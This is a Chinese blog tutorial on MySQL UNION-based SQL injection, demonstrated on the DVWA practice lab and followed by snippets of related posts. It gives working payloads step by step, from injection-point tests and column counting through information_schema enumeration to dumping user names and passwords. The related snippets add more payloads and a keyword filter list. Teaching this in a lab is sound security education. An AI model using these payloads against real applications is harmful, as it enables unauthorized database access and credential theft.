外网学习(一) SQL注入——联合注入篇

已于 2024-04-04 00:48:09 修改
阅读量272 收藏 6
点赞数 6
文章标签: 学习 sql 数据库
于 2024-04-04 00:41:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35075142/article/details/137354659
版权

清明假期立一个小flag,写十篇文章/doge

原理:

攻击者利用MySQL中的union 函数能够从数据库中其他表中检索数据,导致敏感信息泄露甚至写入web shell

利用条件:

1.注入点所在页面有回显

2.允许使用order by;允许使用union

步骤以及演示

以下将以DVWA中靶场作为联合注入步骤的演示

1:判断注入点

判断可能存在注入点的地方:往往是搜索框,URL栏等一切有可能与数据库交互的地方

在此靶场中Submit框和GET传参均可进行联合查询        

347420acaca843d6a4e8f42b34586e53.png

2.判断注入点位整形/字符型

判断

     1' and '1'='1

     1' and '1'='2

如果返回结果相同:即 字符=字符;为判断依据,则为字符型

如果返回结果不同:即 1=1,1=2;为判断依据,则为整形

e5bd755171ff45f98dd78fd84f590143.png

d12282ba6df84c5a8c6aafb2a9ea47f9.png

显然两条代码回显不相同,则为整形。

 

3.使用order by 推断列数

    1' order by 2 #

order by:`ORDER BY` 子句的作用是根据指定的列对SQL查询的结果集进行排序。排序只能对存在的数进行排序。例如:排序2回显正常,排序3回显不支持,则字段数为2.(即表中列数为2)

#:MySQL中的注释符,#作用为注释后面的语句,类似的还有--+.

6d871246d5314b1991bf5ada30f1348f.png

 

4.使用union,确定显错位

    1‘ union select 1,2 #

024d1e5d2aec4d849803b533e54873ac.png

由图中 1 2 位置可发现显错位

5.获取数据库库名

1' union select user(),database()#

7d4196a320f14c9ab9f57a1ea031952f.png

即替换显错位 1,2 为 user(),database()

6获取数据库中表名

1' union select group_concat(table_name),database() from information_schema.tables where table_schema = database()#

03cc3de7b0434b7ca897fb22d41524db.png

group_concat(table_name):将table_name中的表名拼接成一个字符串(这样可以一个显错位搞定)

information_schema:是MySQL提供的系统库,有库名,表名的信息

7.获取数据库表中所有的字段

1' union select group_concat(column_name),database() from information_schema.columns where table_schema = database()#

163989e249cf4a3aabc552500e402ce4.png

8.获取字段中数据

1' union select group_concat(user),group_concat(password) from dvwa.users#

ab7dcdc852ef4d4a9a9040bc1f1c415b.png

 

 

Flyhha
关注
  • 6
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
SQL注入---联合注入
qq_41592307的博客
09-03 235
Union联合注入攻击 1、联合注入的思路(会显示输出内容时,才考虑使用Union注入) (可以在输入框中或者URL中输入内容,如果不能在输入框内输入内容,则需要使用Burp suite使用 重发器,修改id中的内容进行爆破数据) 判断是否存在SQL注入点(判断注入的类型) 使用 order by 1-99 语句来检测数据表的字段数量 1.字符型 2.整数型 判断输出的位置,通过联合查询,union select 字段数 ...
union联合注入
m0_60945802的博客
03-21 4897
union联合注入
联合注入
qq_35191331的博客
08-16 961
题目连接:http://103.238.227.13:10087/ //过滤sql$array = array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','order','li
sql注入中的联合注入
..
12-06 6114
联合注入 联合注入顾名思义,就是使用联合查询进行注入的一种方式,是一种高效的注入的方式,适用于有回显同时数据库软件版本是5.0以上的MYSQL数据库。至于为什么需要版本是5.0以上的MYSQL数据库是因为MYSQL会有一个系统数据库information_schema,能很快的通过几条注入语句获取到想要的数据。 UNION语法 mysql中,union用于将多个select语句的结果组合到一个结果集中,并删除结果集中的重复数据。 语法为: select column,...from tabl.
mysql联合注入_SQL 注入:联合注入
weixin_30585729的博客
01-20 162
SQL注入一直都是web安全的主要漏洞之一,数年来仍旧是最常见的漏洞,其主要是因为前后端进行数据交互时注入恶意的SQL语句,导致最终执行的语句拼接。往往是因为开发人员防护不严,导致未过滤敏感字符。联合注入联合注入是比较常见的一种,可以说是开发人员没有进行任何过滤。这里用PHP来进行简单的数据交互源代码:$id=$_GET['id'];$conn=mysqli_connect("localhost"...
注入技巧收集.txt
07-18
内容将围绕“注入技巧收集”中的一个特定技术——SA点数据库分离技术进行深入探讨,并结合给出的部分内容详细阐述其原理、应用场景以及防范措施。 #### SA点数据库分离技术概述 SA(System Administrator)...
第14章综合案例——电子商务平台网.pptx
09-23
此外,为了保证电子商务平台的安全性,还需要实现用户认证机制、数据加密、防止SQL注入等安全措施。同时,优化搜索引擎收录(SEO)策略,以提高网站的可见度和流量。 总结来说,构建一个电子商务平台网是一个涉及多...
网站维护杀手锏——网络编程——ASP、PHP、JSP与数据库互联.pdf
01-06
5. 安全性与性能优化:在实际的网站维护中,除了基本的编程技术外,还需要关注安全性问题,例如防止SQL注入、XSS攻击等。同时,性能优化也是关键,包括数据库查询优化、缓存策略、减少数据库连接开销等,以确保网站...
ASP技术常遇问题解答-如何编写一个网络传呼机?.zip
03-23
8. **安全性**:考虑到网络通信的安全性,需要对用户输入进行验证和清理,防止SQL注入等攻击。同时,应确保敏感信息(如用户密码)的加密存储。 9. **异步处理**:如果网络传呼机需要实时显示新消息,可能需要使用...
ASP网站CMS程序源码——天下站长网TXcms实例开发.rar
10-17
总之,"ASP网站CMS程序源码——天下站长网TXcms实例开发.rar"是一个宝贵的资源,对于想要深入研究ASP CMS系统或者希望自行开发网站的人来说,是一个极好的学习材料。通过研究和实践,我们可以掌握更多关于ASP编程、...
Mysql注入之一 联合注入
笨蛋9的博客
02-17 3180
一 前言作者也在学习web安全,可能文章中或多或少存在一些错误内容。写些手工注入的文章,一方面能加深对这部分知识的印象,一方面也能大家互相学习。 有人可能问:数据库注入不是有很多非常强大的工具,如sqlmap,为什么还要去花些时间去学习手工注入。虽然使用sqlmap等注入工具能很轻松的对拖一个存在注入漏洞无安全狗的网站的数据库,但却无法知道注入的全过程,不方便后续写一些自动化测试的脚本,同时由于是
浅谈联合注入
weixin_34242819的博客
05-23 231
手工注入学习 首先准备环境,建好两个数据表,一个内容随意,一个装管理员账户密码就行。开始进入主题。 <?php error_reporting(E_ALL ^ E_DEPRECATED); mysql_connect('localhost','root','root'); mysql_select_db('test'); mysql_query("set names ut...
SQL注入1(联合注入
嚴 帅的博客
04-20 5286
数据库基础: 一、数据库的操作 (1)基本语句: mysql -u xxx //进入mysql show databases; //查看所有库名 use XXX; //进入某个库 show tables;//查看库的表 查询语句:select 数据操作语句:insert(插入)、updata(修改)、delete(删除) (2)SQL注入的常用语句。 Order by语句 ...
SQL注入之union联合注入
hobby云说
06-12 3599
特别申明 本文章仅供学习使用,其余利用本文章内容进行的任何行为与本人无关!做任何渗透操作前,请一定三思,做个遵纪守法的好公民! 简介 在初见SQL注入提到三种分类方式,其中一个是根据注入是否有回显来进行分类,本文将详细讲解有回显这类的注入方式。有有回显的注入,顾名思义,程序会将后端执行SQL查询语句的结果,返回显到页面中,通过各种巧妙的方式让各种你想要知道的关键信息显示在页面中。有回显的注入常见的有联合注入和报错注入,本文将详细讲解union联合注入。 正文 ...
sql注入之union联合注入_sql注入union
最新发布
2401_83739411的博客
04-12 803
1、如果都报错,则为整形闭合。2、如果单引号报错,双引号不报错。然后尝试?id=1 –– 无报错则单引号闭合。报错则单引号加括号。3、如果单引号不报错,双引号报错。然后尝试?id=1"––无报错则双引号闭合。报错则双引号加括号。4、判断真值的方法是指通过构造一个条件语句,利用应用程序返回的结果来判断闭合方式如果是没有报错回显的情况,则可以用判断真值的方法来判断闭合方式。例如:输入index.php?id=1’,页面显示错误再输入index.php?id=1’ --+,页面显示正确。
mysql union联合注入
Sys1em32 安全之路
12-05 238
记录一下联合查询常用的手工注入语句,这里以dvwa为例,联合查询页面必须要有回显 0x01.判断是否存在注入点: 一般添加单引号查看是否报错,或者and 1=1查看页面是否正常显示,and 1=2查看是否报错,判断存在注入。 0x02.判断字段数 注入语句:http://192.168.10.4/dvwa-master/vulnerabilities/sqli/?id=1'+orde...
SQL注入之union 联合注入
weixin_53711701的博客
01-16 4406
SQL注入之union联合注入
SQL注入之路之一:联合注入
weixin_62715196的博客
08-10 654
简单介绍union联合注入的原理、常用数据库名,以及一次简单的手工联合注入流程
union(联合)注入和布尔注入
weixin_41489908的博客
11-11 750
没有很快乐,也没有不快乐,好像不该这样,但也只能这样,成长也许如此,行于奔溃边缘又慢慢自愈吧。。。 ---- 网易云热评 一、union联合注入 1、select 1,2,3会生成一张临时表,表中的字段为查询的字段,内容也是查询的字段 2、select 1,2,3 union select 3,2,1,同样生成一张临时表,表中的字段为union左边查询的字段,内容为union左右两边查询的字段! 3、如果不想显示左边的查询数据,只要左边的查询结果为假,就不会显示数据,比如:a...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Flyhha

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值